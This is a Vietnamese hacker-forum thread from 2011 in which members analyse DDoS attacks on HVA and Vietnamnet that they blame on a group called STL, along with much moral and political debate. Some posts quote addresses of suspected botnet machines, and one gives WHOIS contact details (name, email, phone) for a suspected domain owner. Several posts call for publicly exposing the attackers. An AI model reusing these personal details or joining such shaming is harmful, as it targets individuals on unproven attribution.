banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thảo luận virus, trojan, spyware, worm... Phân tích tính chất vài trận DDoS HVA vừa qua.  XML
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 15/08/2011 22:18:32 (+0700) | #421 | 245079
levanduyet
Member

[Minus]    0    [Plus]
Joined: 24/06/2007 12:30:31
Messages: 9
Offline
[Profile] [PM]

conmale wrote:
Chắc chắn stl vẫn còn ít nhất là 1 botnet khác chưa bị phát hiện. Chắc chắn các zombies vẫn còn nhiễm một thứ tương tự như "AcrabatUpdater.exe". 

Từ sáng đến giờ vào không được, tranh thủ vào buổi tối (vì nghĩ rằng buổi tối các máy bị botnet ở VN tắt máy nên trang HVA không bị DDOS)
Hy vọng các bạn có thể phát hiện ra các botnet khác để có thể cảnh báo cho người dùng khác nhằm chấm dứt cái trò đuổi tìm này.

Tks conmale, TQN,...

LVD
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 16/08/2011 03:49:26 (+0700) | #422 | 245084
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

myquartz wrote:
Không ngờ nhiều hacker non trẻ ngoài tay nghề IT ra mà ngón nghề chửi cũng không thua gì các bậc tiền bối ngoài chợ.
A-di-đà-Phật, thiện tai, thiện tai. Thôi thì quảng gánh lo đi mà vui sống các bác ạ, dẫu phận đời đen bạc, thật giả lẫn lộn... 


Lạ thiệt. Những trò ăn cắp, lừa đảo, xâm phạm máy tính cá nhân, phát tán virus, tấn công từ chối dịch vụ..v...v.. đó là chưa kể những trò "bạch hoá" bằng cách thêu dệt, bêu rếu, lăng nhục kẻ khác đều là những trò không những vi phạm pháp luật trầm trọng mà còn là những hành vi phi đạo đức, vậy mà từ trước đến giờ bạn myquartz có bao giờ lên tiếng phê bình những trò bại hoại này đâu? Trái lại, những kẻ phê phán (hoặc chửi bới) những trò bại hoại ấy thì bạn myquartz lại nhảy vô mà chụp cái mũ "nghề chửi"? Bạn đang gián tiếp cho rằng những việc làm bại hoại kia không đáng để chửi và những người đang chửi những việc bại hoại là đáng khinh bỉ?

Bạn có bị đụng chạm, bị tấn công, bị hư hại, bị mất mác đâu mà không thản nhiên? Bạn nghĩ rằng ai đó phá hoại bạn, phá hoại cả một cộng đồng bằng đủ thứ trò thô bỉ và ti tiện đi chăng nữa cũng nên "quảng gánh lo đi mà vui sống"? Xin lỗi bạn, đối với tớ, đây cũng chỉ là một thứ lập luận bullshit. Phận đời đen bạc khỉ gì đây? Ở đây chỉ có một bọn phá hoại bao nhiêu năm nay nhưng tất cả các cơ quan chức năng, báo chí, thông tin đều làm ngơ và một bọn chống lại bọn phá hoại bằng khả năng và điều kiện ít ỏi mà thôi. Ai đó tới nhà bạn, đập phá nhà bạn, bêu rếu bạn và bạn cắn răng mà ta thán rằng "phận đời đen bạc" rồi cam chịu? Xin lỗi bạn, đây là thái độ bạc nhược hoặc không trung thực (vì con người không phải là những con liu điu chỉ biết cúi đầu chịu hèn).

Tớ không thể tin nổi là cả một quốc gia mà lại hoàn toàn im ắng trước sự tấn công triền miên tới vietnamnet. Chỉ cần hốt một mớ log trên hệ thống của vietnamnet, chọn ra một mớ IP addresses rồi liên hệ với ISP để trace ra máy con bị nhiễm malware. Đến vài nơi để lấy mẫu malware, re xong là liên hệ trực tiếp với data center của masterbot. Chỉ cần lấy tư cách vncert chớ đừng nói chi cơ quan an ninh thì các data center sẵn sàng cung cấp thông tin cần thiết. Chộp ra 1 ông thì cách gì mà không lòi ra cả đám?

Những phê phán về khía cạnh đạo đức ở đây trực tiếp đi từ những kết quả kỹ thuật mà ra. Kỹ thuật cũng có đạo đức và phi đạo đức. Kỹ thuật mà không có yếu tố đạo đức thì chẳng khác gì những thằng người máy làm theo chương trình ấn định sẵn. Hãy làm con người và đừng làm người máy!
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 16/08/2011 06:53:10 (+0700) | #423 | 245087
nobody198
Member

[Minus]    0    [Plus]
Joined: 14/08/2011 21:43:20
Messages: 1
Offline
[Profile] [PM]

conmale wrote:

myquartz wrote:
Không ngờ nhiều hacker non trẻ ngoài tay nghề IT ra mà ngón nghề chửi cũng không thua gì các bậc tiền bối ngoài chợ.
A-di-đà-Phật, thiện tai, thiện tai. Thôi thì quảng gánh lo đi mà vui sống các bác ạ, dẫu phận đời đen bạc, thật giả lẫn lộn... 


Lạ thiệt. Những trò ăn cắp, lừa đảo, xâm phạm máy tính cá nhân, phát tán virus, tấn công từ chối dịch vụ..v...v.. đó là chưa kể những trò "bạch hoá" bằng cách thêu dệt, bêu rếu, lăng nhục kẻ khác đều là những trò không những vi phạm pháp luật trầm trọng mà còn là những hành vi phi đạo đức, vậy mà từ trước đến giờ bạn myquartz có bao giờ lên tiếng phê bình những trò bại hoại này đâu? Trái lại, những kẻ phê phán (hoặc chửi bới) những trò bại hoại ấy thì bạn myquartz lại nhảy vô mà chụp cái mũ "nghề chửi"? Bạn đang gián tiếp cho rằng những việc làm bại hoại kia không đáng để chửi và những người đang chửi những việc bại hoại là đáng khinh bỉ?

Bạn có bị đụng chạm, bị tấn công, bị hư hại, bị mất mác đâu mà không thản nhiên? Bạn nghĩ rằng ai đó phá hoại bạn, phá hoại cả một cộng đồng bằng đủ thứ trò thô bỉ và ti tiện đi chăng nữa cũng nên "quảng gánh lo đi mà vui sống"? Xin lỗi bạn, đối với tớ, đây cũng chỉ là một thứ lập luận bullshit. Phận đời đen bạc khỉ gì đây? Ở đây chỉ có một bọn phá hoại bao nhiêu năm nay nhưng tất cả các cơ quan chức năng, báo chí, thông tin đều làm ngơ và một bọn chống lại bọn phá hoại bằng khả năng và điều kiện ít ỏi mà thôi. Ai đó tới nhà bạn, đập phá nhà bạn, bêu rếu bạn và bạn cắn răng mà ta thán rằng "phận đời đen bạc" rồi cam chịu? Xin lỗi bạn, đây là thái độ bạc nhược hoặc không trung thực (vì con người không phải là những con liu điu chỉ biết cúi đầu chịu hèn).

Tớ không thể tin nổi là cả một quốc gia mà lại hoàn toàn im ắng trước sự tấn công triền miên tới vietnamnet. Chỉ cần hốt một mớ log trên hệ thống của vietnamnet, chọn ra một mớ IP addresses rồi liên hệ với ISP để trace ra máy con bị nhiễm malware. Đến vài nơi để lấy mẫu malware, re xong là liên hệ trực tiếp với data center của masterbot. Chỉ cần lấy tư cách vncert chớ đừng nói chi cơ quan an ninh thì các data center sẵn sàng cung cấp thông tin cần thiết. Chộp ra 1 ông thì cách gì mà không lòi ra cả đám?

Những phê phán về khía cạnh đạo đức ở đây trực tiếp đi từ những kết quả kỹ thuật mà ra. Kỹ thuật cũng có đạo đức và phi đạo đức. Kỹ thuật mà không có yếu tố đạo đức thì chẳng khác gì những thằng người máy làm theo chương trình ấn định sẵn. Hãy làm con người và đừng làm người máy! 



Mình đồng ý với conmale và các quản trị HVA khác! Dẫu thế giới mạng có thật giả lẫn lộn, kẻ đen - người trắng nhưng bạn phải tin vào lý trí của mình, lý tưởng của mình. Những người như bạn comale, TQN... đang làm tất cả để bảo vệ ngôi nhà HVA, bảo vệ lý tưởng của HVA, bảo vệ niềm tin - niềm tin vào chính nghĩa. Cảm ơn vì tất cả!
N198
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 16/08/2011 07:34:39 (+0700) | #424 | 245090
mv1098
Member

[Minus]    0    [Plus]
Joined: 18/07/2009 14:19:13
Messages: 119
Offline
[Profile] [PM]
@anh conmale

có những người không bị động chạm vì bị hacker tấn công mà là bị chửi anh à.

@myquartz

Không ngờ nhiều hacker non trẻ ngoài tay nghề IT ra mà ngón nghề "chọc gậy bánh xe", "gắp lửa bỏ tay người" cũng không thua kém gì Lý Thông cả.
A-di-đà-Phật, thiện tai, thiện tai. Thôi thì quảng gánh lo đi mà vui sống các bác ạ, dẫu phận đời đen bạc, thật giả lẫn lộn...
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 16/08/2011 08:31:53 (+0700) | #425 | 245091
[Avatar]
asmking
Member

[Minus]    0    [Plus]
Joined: 07/01/2007 19:29:04
Messages: 15
Offline
[Profile] [PM]
- Tôi nghĩ cái đáng buồn và đau lòng nhất khi nghĩ đến nhóm STL này là họ cũng có thể là người Việt như mỗi người chúng ta, như những người đang chủ trì các diễn đàn, blog lề trái hiện nay. Tất cả mọi người đều là người Việt Nam, cùng một dân tộc, cùng một quê hương, đất nước, dẫu có những lý tưởng, suy nghĩ hay quan điểm khác nhau nhưng nếu trên tinh thần nhân văn, nhân đạo thì sao lại không thể cùng nhau ngồi lại để thảo luận, nói chuyện chứ.

- Từ khi đi học cho đến nay, mỗi khi học lịch sử tôi lại được nghe nói đến tinh thần đoàn kết của người VN mỗi khi có chiến tranh chống ngoại xâm xảy ra, thật là vô cùng tự hào làm sao, nhưng đến bây giờ tôi mới hiểu được cái tinh thần đoàn kết đó chỉ xảy ra khi có chiến tranh mà thôi, chẳng phải thế nên dân Việt mình mới mãi đứng sau thiên hạ, không thể nào so sánh được với những dân tộc Á Đông khác.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 16/08/2011 09:32:46 (+0700) | #426 | 245094
phanledaivuong
Member

[Minus]    0    [Plus]
Joined: 23/05/2008 17:34:21
Messages: 315
Location: /dev/null
Offline
[Profile] [PM] [WWW]

asmking wrote:
- Tôi nghĩ cái đáng buồn và đau lòng nhất khi nghĩ đến nhóm STL này là họ cũng có thể là người Việt như mỗi người chúng ta, như những người đang chủ trì các diễn đàn, blog lề trái hiện nay. Tất cả mọi người đều là người Việt Nam, cùng một dân tộc, cùng một quê hương, đất nước, dẫu có những lý tưởng, suy nghĩ hay quan điểm khác nhau nhưng nếu trên tinh thần nhân văn, nhân đạo thì sao lại không thể cùng nhau ngồi lại để thảo luận, nói chuyện chứ.

- Từ khi đi học cho đến nay, mỗi khi học lịch sử tôi lại được nghe nói đến tinh thần đoàn kết của người VN mỗi khi có chiến tranh chống ngoại xâm xảy ra, thật là vô cùng tự hào làm sao, nhưng đến bây giờ tôi mới hiểu được cái tinh thần đoàn kết đó chỉ xảy ra khi có chiến tranh mà thôi, chẳng phải thế nên dân Việt mình mới mãi đứng sau thiên hạ, không thể nào so sánh được với những dân tộc Á Đông khác. 


Cũng không hẳn những blog kia là lề trái. ngày xưa việt nam theo tầu khựa viết từ bên phải sang bên trái là ngược lại so với thế giới văn minh hiện đại smilie nay làm trái lại cái lè đấy có khi lại là đúng và văn minh tiên bộ smilie)
Nếu gọi là diễn đàn blog lề trái thì theo mình nên cho thêm "(theo 1 số ít người việt nam)" smilie cho nó chuẩn
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 16/08/2011 09:40:53 (+0700) | #427 | 245095
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

asmking wrote:
- Tôi nghĩ cái đáng buồn và đau lòng nhất khi nghĩ đến nhóm STL này là họ cũng có thể là người Việt như mỗi người chúng ta, như những người đang chủ trì các diễn đàn, blog lề trái hiện nay. Tất cả mọi người đều là người Việt Nam, cùng một dân tộc, cùng một quê hương, đất nước, dẫu có những lý tưởng, suy nghĩ hay quan điểm khác nhau nhưng nếu trên tinh thần nhân văn, nhân đạo thì sao lại không thể cùng nhau ngồi lại để thảo luận, nói chuyện chứ.
 

Được như vậy thì quá tuyệt vời rồi smilie nhưng không may, cho đến nay qua hết thập niên thứ nhất của thế kỷ 21 rồi, sống trong thời đại "information age" rồi nhưng vẫn chưa thoát khỏi bóng ma này. Thật ra, nước Việt ta tội nghiệp, hết bị đô hộ rồi đến chiến tranh triền miên, con người trở nên sợ hãi, mặc cảm, hung hãn, thậm chí tàn nhẫn nhưng vẫn không thoát nổi ám ảnh nhược tiểu. Bởi vậy, không đủ khả năng, không đủ dũng khí để nói và nghe theo đúng tinh thần nhân văn, nhân đạo. Từ thời nảo thời nao, ta đã có những câu ca dao:
Lời nói không mất tiền mua
Lựa lời mà nói cho vừa lòng nhau.

Đạo Phật du nhập vào nước ta rất sớm (có những dấu hiệu từ thế kỷ thứ III trước Công Nguyên, Phật Giáo đã du nhập vào Việt Nam). Đạo Phật lấy cái tâm làm gốc, dạy con người biết yêu thương, tha thứ, biết bỏ cái sai trái để quay về cái đúng đắn, chân thật. Hay vì chiến tranh quá tàn khốc, mất mác quá nhiều cho nên bây giờ cái gì cũng phải đúng không thể sai, cái gì cũng phải thắng không thể thua? Thậm chí đi tới chỗ thành tích thì ít nhưng phải xít cho nhiều và cái gì sai thì phải ếm cho kỹ. Việc ếm này bao gồm luôn việc phá hoại và bịt miệng.

Có 2 loại người, loại dùng trí tuệ và ngôn ngữ để giải quyết trở ngại và loại dùng nắm đấm (hoặc bất cứ thứ gì khác dù tệ hại tới đâu) để giải quyết. Ở đâu cũng có hai loại người này. Chỉ có điều nếu loại người thứ hai chiếm đa số thì xã hội loài người đang đi thụt lùi về lại thời đại ở hang đá bởi vì con người ở thời đó dùng nhiều bắp cơ mà lại ít trí tuệ.

asmking wrote:

- Từ khi đi học cho đến nay, mỗi khi học lịch sử tôi lại được nghe nói đến tinh thần đoàn kết của người VN mỗi khi có chiến tranh chống ngoại xâm xảy ra, thật là vô cùng tự hào làm sao, nhưng đến bây giờ tôi mới hiểu được cái tinh thần đoàn kết đó chỉ xảy ra khi có chiến tranh mà thôi, chẳng phải thế nên dân Việt mình mới mãi đứng sau thiên hạ, không thể nào so sánh được với những dân tộc Á Đông khác. 

Người dân Việt Nam không phải kém cỏi, không trí tuệ, thiếu đoàn kết mà vì những đức tính ấy không được duy trì và phát huy đúng mức. Chừng nào còn biết được cái sai, tiếp nhận cái sai và sửa chữa những cái sai thì chừng ấy còn phát triển. Chừng nào mà vẫn tiếp tục đúng, tiếp tục chiến thắng, tiếp tục thành tích thì chừng ấy những đức tính kia sẽ bị thui chột bởi vì chẳng có gì để vươn lên và phát triển nữa (và trên đời này thì chẳng có cái gì đúng mãi được trong khi thật sự sai phè thì đầy ra đó).
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 16/08/2011 10:17:17 (+0700) | #428 | 245102
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Có "lề trái", "lề phải" hay "lề giữa" như tui thì cũng kệ người ta. Hiến Pháp Viet Nam ta quy định "Công dân có quyền tự do ngôn luận" (điều mấy thì sorry, tui không nhớ).
Vì vây, theo "ngu ý" của tui:
1. Hành động DDOS, chiếm đoạt blog, xoá bài viết trên blog của người ta là vi phạm hiến pháp. Hơn nữa, đa số các blog lề trái là của người Việt ta được đặt ở nước ngoài, những người đó là đa số công dân nước ngoài, không phải mang công dân, quốc tịch Viet Nam. Các hành động phá hoại trên của mấy "đại ca" trên đội dưới đạp, "sống chết theo lệnh", "sống chết phập phù (hay phập phồng ha ?)" này là vi phạm pháp luật quốc tế, vi phạm luật pháp nước đó.
2. Hành động "bạch hoá" của stl là hành động vi phạm pháp luật ở mọi nước. Bôi nhọ, lăng nhục, xúc phạm người khác thì ở nước nào cũng vậy (trừ một số nước ra ???) ra thì phải hầu toà, bị pháp luật mời đi "nghỉ mát, đài thọ cơm nước" ???
3. Hành động viết, phát tán virus, malwares thì ở đâu cũng vậy, mọi nước: vi phạm pháp luật, cũng được mời đi "nghỉ mát" luôn.
4. Hành động chiếm đoạt hộp mail của người khác: xâm phạm quyền tự do, bí mật thư tín của người khác, chiếm đoạt tài sản của người khác.
5. Hành động DDOS dùng bot nằm vùng: xâm phạm và sử dụng bất hợp pháp tài sản cá nhân (cái máy tính), ảnh hưởng đường truyền, băng thông là tài sản chung của xã hội, do người dân đóng thuế mà có.

Kiến thức pháp luật của tui thì <= 0, viết ra các bác đừng cười, nghĩ sao viết vậy thôi.

Nhiều cậu còn nguỵ biện, bao che cho hành động xấu xa của stl. Vd có cậu đã nói với tui là công cụ không phản ánh con người, hay họ hành động như vậy vì ổn định chính trị, hay tui đang làm "tester" miễn phí cho stl.... Nhiều câu làm tui rất bức xúc (hay nói thẳng là tức lộn gan).

Đx, đã là ăn cướp, ăn trộm thì không có thằng ăn cướp ăn trộm nào là 100% chính nghĩa hết (thậm chí mấy thằng kiếm hiệp hồi nhỏ em ghiền đọc: cướp của nhà giàu chia cho nhà nghèo). Đã là cướp, là trộm thì pháp luật chính nghĩa sẽ sờ gáy không sớm thì muộn, còn nếu pháp luật chưa sờ gáy vì lý do xxx gì đó thì thì công luận, nhân dân, lương tâm mọi người cũng lên án, phỉ nhổ, khinh bỉ. Và đã là ăn cướp, ăn trộm thì đi cướp bằng xe con hay xe đạp, dùng kiếm Nhật, súng hay dao mổ heo thì cũng là cướp là trôm thôi. Cậu đồng ý với tui không Look2Me ? Con người chính nghĩa, ngay thẳng không bao giờ dùng những hành động, công cụ xấu xa đê hèn đó, trừ những con người thuộc thế hệ bị nhiểm nặng tư tưởng "trên đội dưới đạp", bất chấp tất cả, chà đạp lên người khác, tham nhũng, hối lộ... để đạt mục đích mà thôi.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 16/08/2011 10:33:41 (+0700) | #429 | 245103
kutruoi
Locked

[Minus]    0    [Plus]
Joined: 15/08/2011 12:47:31
Messages: 22
Offline
[Profile] [PM]

Đọc những dòng anh conmale viết phía trên em tâm đắc quá, và cũng xin phép được tham gia vài câu .

Người đời thường có câu "usually, your actions base on what you believe" tạm dịch " những điều bạn làm, thường dựa vào những gì bạn tin ". Đạo Chúa cũng du nhập vào nước ta rất sớm. Đạo Chúa dạy con người biết yêu thương, sản sẻ và trung thực; nhưng hơn thế nữa đạo Chúa chỉ dạy rằng, cuộc sống đời sau " after death" mới thực sự là cuộc sống đời đời và quan trọng nhất. Cuộc sống này chỉ là một sự thử thách của tâm thần và linh hồn mỗi con người trước những cám dỗ và bóng tối. Con người việt nam trải qua bao thăng trầm của lịch sử phát triển dân tộc đã luôn thể hiện rõ sự sáng tạo và khả năng học hỏi; điều này thể hiện rõ khi chúng ta đã tách ra khỏi dân trung quốc, chúng ta đã phát triển chữ hán nôm cho riêng mình dựa trên chữ tàu, và sau này là chúng ta tiếp thu chữ quốc ngữ do các nhà chuyền giáo Tây phương truyền cho. Người việt nam đương đại (phần nhiều) sống chưa trung thực, sống chưa nhân ái, sống khổ nhọc, vất vả và không thanh thản. BỞI ĐÂU ??? = niềm tin của họ để nơi nào vậy? liệu rằng họ có để nơi thanh tịnh, bình an vô thường dung dị nơi đạo Phật? hay họ san sẻ, yêu thương hết mình, sống phước hạnh để đời sau được về nơi thiên đàng với Chúa ? oh NO NO..vậy đại bộ phận họ tin vào đâu? họ tin vào những hành động mang lợi lại cho họ trước mắt mà bỏ qua thương hiệu của cả một dân tộc. họ tin vào chính họ nhiều hơn họ tin vào anh sáng và chân lý của sự thật. họ tin vào tối tăm và đường tắt vì điều đó dẫn họ tới sự sung sướng trần gian. họ tin vào sự trá hình; họ tin vào mọi điều khiến cho RIÊNG bản thân họ phê pha . Chúa ơi ! Vì điều họ tin là bóng tối nên hành động của họ u ám và khổ đau . Chúa Trời (ông trời) đã dành ưu ái, đã giác ngộ dân tộc này, đã thử thách qua khổ đau triền miên của chiến tranh, bệnh dịch, lụt lội .v.v nhưng đến vòng thi cuối cùng họ đã bỏ đi cái chân lý chung ngàn đời để đặt cải RIÊNG bản ngã lên trên hết. Do vậy hành động họ làm dựa vào một MỚ lý thuyết tả phế lù của mọi khúc đoạn của lịch sử phát triển nhân loại. Họ biết thể nhanh chóng, núp bóng mọi môi trường như con tắc kè hoa chẳng muốn ra ánh sáng!! họ cài cắm, họ dân vận, họ block họ ban mọi ánh sáng ! họ muốn mọi người trong tối tăm giống họ. => họ là malware .

xin hết !

xin lĩnh giáo các anh các bạn.
mời bạn ghé xem site này hay quá ! http://danlambaovn.blogspot.com
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 16/08/2011 10:51:44 (+0700) | #430 | 245106
[Avatar]
insanity
Member

[Minus]    0    [Plus]
Joined: 20/02/2011 00:20:38
Messages: 17
Offline
[Profile] [PM] [Yahoo!]

Đã có thông báo của vietnamnet về sever quá tải : http://vietnamnet.vn/vn/cong-nghe-thong-tin-vien-thong/35560/thong-bao-ve-viec-vietnamnet-bi-qua-tai.html
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 16/08/2011 10:56:23 (+0700) | #431 | 245107
[Avatar]
conmale
Administrator

Joined: 07/05/2004 23:43:15
Messages: 9353
Location: down under
Offline
[Profile] [PM]

insanity wrote:

Đã có thông báo của vietnamnet về sever quá tải : http://vietnamnet.vn/vn/cong-nghe-thong-tin-vien-thong/35560/thong-bao-ve-viec-vietnamnet-bi-qua-tai.html 


Tối hôm qua tớ nhận được một đoạn tcpdump lấy trên hệ thống proxy của vietnamnet. Thông qua tính chất của những request "bất thường", tớ xác nhận thủ phạm cuộc tấn công vào vietnamnet chính là stl.

Một IP thuộc mạng "ba gờ" của vinaphone mà gởi 4 request trong 1 giây đến 4 trang khác nhau của vietnamnet?





Một IP khác trong chuỗi IP động cho ADSL của FPT cũng chẳng khác mấy:




Đây là cái trò đổi random User-Agent và "crawl" của con bot stl chớ không chạy đằng trời nào hết, không thì dân Việt Nam mê đọc vietnamnet thiệt, hì hì.
What bringing us together is stronger than what pulling us apart.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 16/08/2011 11:03:31 (+0700) | #432 | 245109
vndncn
Member

[Minus]    0    [Plus]
Joined: 21/08/2006 10:38:00
Messages: 77
Offline
[Profile] [PM]

conmale wrote:

PS: tớ phải nói thật là tớ rất buồn khi khám phá ra một số chi tiết dính líu đến một số thành viên HVA (hoặc đã từng là thành viên của HVA) cũng thuộc đám phá hoại này nhưng không sao, một cái cây còn có cành cao, cành thấp, lá xanh, lá sâu mà huống hồ chi mạng ảo tạp nham? 


Đã là thành viên HVA, mà còn DDos HVA, đúng là ăn cháo đá bát.
Cảm ơn các anh, em HVA nhiệt tình phân tích đám malware STL và gửi những hướng dẫn để mọi người biết cách diệt lũ virus sâu mọt này. Hi vọng các anh, em luôn luôn cập nhật cách diệt lũ malware STL xấu xa này để giúp mọi người hiểu hơn về cách phòng và chống malware.
Em rất thích kỹ thuật phân tích malware của các anh TQN, acoustics89, lequi, asaxin, bolzano_1989...(nhiều quá hok nhớ hết tên mấy anh, em-->thông cảm nhe). Hok biết chừng nào em mới làm được giồng mấy anh đây, buồn về trình độ mình quá. Hic hic..

[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 16/08/2011 12:51:56 (+0700) | #433 | 245115
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Vấn đề quan trọng nhất là chúng ta phải hợp lực nhau lúc này để tìm ra con bot mà chúng ta chưa biết đang DDOS Vietnamnet và HVA ta. Mong bà con cùng tham gia, ai có súng dùng súng, ai có dao dùng dao như lời Bác hồi xưa kêu gọi.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 16/08/2011 13:04:02 (+0700) | #434 | 245117
[Avatar]
GhoZt
Member

[Minus]    0    [Plus]
Joined: 13/11/2008 12:04:55
Messages: 36
Location: |~~~Fantasy~~~|
Offline
[Profile] [PM]
Mình nghĩ đã đến lúc nên bạch hoá cái bọn stl bẩn thiểu đó đi ! Pháp luật VN ko (hoặc chưa) sờ đến nó thì mình cũng phải vạch mặt bọn chúng !
Mọi người cứ xem, bon stl đã bị a Conmale, TQN .. nói bóng gió về bọn nó rồi nhưng bọn chúng vẫn ko sợ, vẫn ddos và ddos cả HVA chúng ta !
Phải lôi chúng ra đi, lôi ra để a e ta bít mà phỉ nhổ ! mấy chục ngàn bãi nước bọt cũng đủ dìm chết tụi nó !!!
void main()
{
while ( you_live)
{
if (you_failed) try_again();
else if ( you_won) find_new_challenge();
}
system("DEATH");
return HELL;
}
"
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 16/08/2011 15:52:30 (+0700) | #435 | 245120
template
Member

[Minus]    0    [Plus]
Joined: 25/07/2011 02:18:47
Messages: 16
Offline
[Profile] [PM]
Tui cũng có ý kiến nên bạch hoá bọn này. Cho giang hồ chửi chơi chứ ko để làm gì cả.
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 16/08/2011 17:33:00 (+0700) | #436 | 245121
PXMMRF
Administrator

Joined: 26/09/2002 07:17:55
Messages: 946
Offline
[Profile] [PM]

conmale wrote:
Vừa phát hiện một botnet khác sử dụng User-Agent "Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)". Sau đây là danh sách 300 IP dữ dằn nhất (chủ yếu là từ VN). Nếu anh chị em nào thấy có IP của mình nằm trong danh sách này, xin vui lòng liên hệ trực tiếp với tôi qua PM. Cám ơn.

113.160.101.152
113.160.110.89
113.160.111.68
.............................
58.187.96.164
66.110.121.148
71.21.15.74 


Cám ơn thông tin của anh conmale.
Tôi có vài ý kiến sau:

1- Chắc là STL đang áp dụng kỹ thuật "User agent spoofing" cho mạng botnet mới này.

2- Như vậy trong virus -trojan của STL phải có một tool (hay codes) thay đổi (change) IE' User agent string hay FireFox' User agent string, áp dung cho mọi version của IE hay FF.
(Xin TQN và acc chú ý điều này khi RCE các virus của STL)

3- Việc "User agent spoofing" có lẽ để vượt qua một vài rule nào đó của bác conmale config. trong Robot Exclusion standard (robots.txt), tai web root. Ngoài ra việc spoofing User agent cũng làm cho các tiện ích quản lý user của website như Sitemap, Weblog... sẽ mất tác dụng hay giảm tác dụng

4- Tôi chưa hỏi anh comale về sự có hay không việc áp dụng ACAP (Automated Content Access Protocol) plug-in với robots.txt ?

5- Về riêng cái user agent khá đăc biệt trên đây của STL "Accoona-AI-Agent/1.1.2 (aicrawler at accoonabot dot com)", thì aicrawler at accoonabot dot com là một email: aicrawler@accoonabot.com và Accona là tên 1 công ty có website là www.accona.com (chuyên về web search engine, có chi nhánh tai Thương Hải TQ). Công ty này đã đóng cửa từ lâu và một công ty khác đã mua lai. Tôi đang tìm hiểu về mối liên quan đến một web crawler nào đó, có hay không?

6- Trong các đia chỉ IP nói trên thì đa phần của VN (ở cả 3 miền Bắc, Trung Nam do các ISP VNPT, Viettel, FPT quản lý). Có một số đia chỉ IP ở Lào, châu Phi, Nam Triều tiên...

The absence of disagreement is not harmony, it's apathy.
(Socrates)
Honest disagreement is often a good sign of progress.
(Mahatma Gandhi)
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 16/08/2011 23:02:18 (+0700) | #437 | 245137
TQN
Elite Member

[Minus]    0    [Plus]
Joined: 29/06/2006 22:28:01
Messages: 888
Location: Biết làm chi ?
Offline
[Profile] [PM] [WWW] [Yahoo!]
Tới ngày hôm nay, 16-08-2011, host map.priper.info không còn trả về flower.bmp và aqua.bmp nữa, nginx trả về "404 Not Found".
Kiểm tra trên robtex.com, thấy có điều lạ là host: E9tn.com lại có cùng IP với map.priper.info. Cái này thì em không hiểu, các bác rành về network giải thích giùm em.
Kiểm tra trong tab Whois của e9tn.com thì thấy
Code:
Registrant:
DAHAI HUANG

Kiểm tra tiếp với http://who.godaddy.com/whoischeck.aspx?Domain=E9TN.COM thì thấy thêm thông tin sau về anh chàng tàu khựa này:
Code:
Registrant:
DAHAI HUANG
hanjiang
putian, Fujian 351100
China

Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
Domain Name: E9TN.COM
Created on: 07-Jan-11
Expires on: 07-Jan-12
Last Updated on: 07-Jan-11

Administrative Contact:
HUANG, DAHAI <a href="mailto:bluesea696@hotmail.com">bluesea696@hotmail.com</a>
hanjiang
putian, Fujian 351100
China
+86.1506036226

Technical Contact:
HUANG, DAHAI <a href="mailto:bluesea696@hotmail.com">bluesea696@hotmail.com</a>
hanjiang
putian, Fujian 351100
China
+86.1506036226

Domain servers in listed order:
NS67.DOMAINCONTROL.COM
NS68.DOMAINCONTROL.COM


Registry Status: clientDeleteProhibited
Registry Status: clientRenewProhibited
Registry Status: clientTransferProhibited
Registry Status: clientUpdateProhibited


Mấy anh stl có thấy "đại ca" DAHAI HUANG này quen quen không ?

Link để bạn đọc kiểm tra = robtex:
http://www.robtex.com/dns/map.priper.info.html
http://www.robtex.com/dns/e9tn.com.html
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 17/08/2011 00:24:10 (+0700) | #438 | 245143
mv1098
Member

[Minus]    0    [Plus]
Joined: 18/07/2009 14:19:13
Messages: 119
Offline
[Profile] [PM]
Em bổ xung thêm mấy cái domain nữa của bro DAHAI HUANG

1 loạt các domain đã bị suspended vì spam và phát tán virus

lunette-carrera-2020.com
puma-max.com
r3tn.com
ckgstar.com
frr5.com
[Up] [Print Copy]
  [Analyzing]   Phân tích tính chất vài trận DDoS HVA vừa qua. 17/08/2011 00:35:42 (+0700) | #439 | 245145
myquartz
Member

